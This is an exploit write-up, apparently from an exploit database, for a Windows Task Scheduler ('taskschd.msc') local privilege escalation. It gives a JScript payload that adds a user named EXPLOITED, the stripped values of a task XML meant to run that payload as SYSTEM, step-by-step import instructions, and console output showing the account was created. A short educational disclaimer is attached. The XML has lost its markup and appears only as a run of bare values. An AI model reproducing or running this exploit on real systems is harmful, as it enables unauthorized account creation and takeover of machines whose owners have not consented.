Microsoft Windows 'taskschd.msc' Local SYSTEM Privilege Escalation Todor Donev https://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg Disclaimer: This or previous programs is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not Todor Donev's responsibility. Use them at your own risk! Related exploit: https://www.exploit-db.com/exploits/35850/ C:\Users\test\Desktop>net user User accounts for \\ETHACK-PC ------------------------------------------------------------------------------- Administrator Guest test The command completed successfully. C:\Users\test\Desktop>net user EXPLOITED /add System error 5 has occurred. Access is denied. C:\Users\test\Desktop> The user 'test' has no privileges to add user. Okey! Let's hacking.. Now, we must create suidshell! C:\Users\test\Desktop>type w00tw00t.xml 1337-01-01T13:37:07.9601296 NT-AUTHORITY\SYSTEM ETHACK-PC\test S4U HighestAvailable Parallel true true true true false true false true true false false false P3D 7 PT1M 3 %USERPROFILE%\Desktop\EXPLOIT.JS C:\Users\test\Desktop>type EXPLOIT.JS suidshell = WScript.CreateObject("WScript.Shell"); suidshell.run("cmd.exe /c net user EXPLOITED EXPLOITED /add", 0); Okey. Now, our PAYLOAD is ready for IMPORT in Task Scheduler v1.0 Run 'taskschd.msc' -> Import Task.. -> Select and Open: w00tw00t.xml -> Run C:\Users\test\Desktop>net user User accounts for \\ETHACK-PC ------------------------------------------------------------------------------- Administrator EXPLOITED Guest test The command completed successfully. C:\Users\test\Desktop> OWNED.. I've got the powah.. :)) # Iranian Exploit DataBase = http://IeDb.Ir [2017-04-24]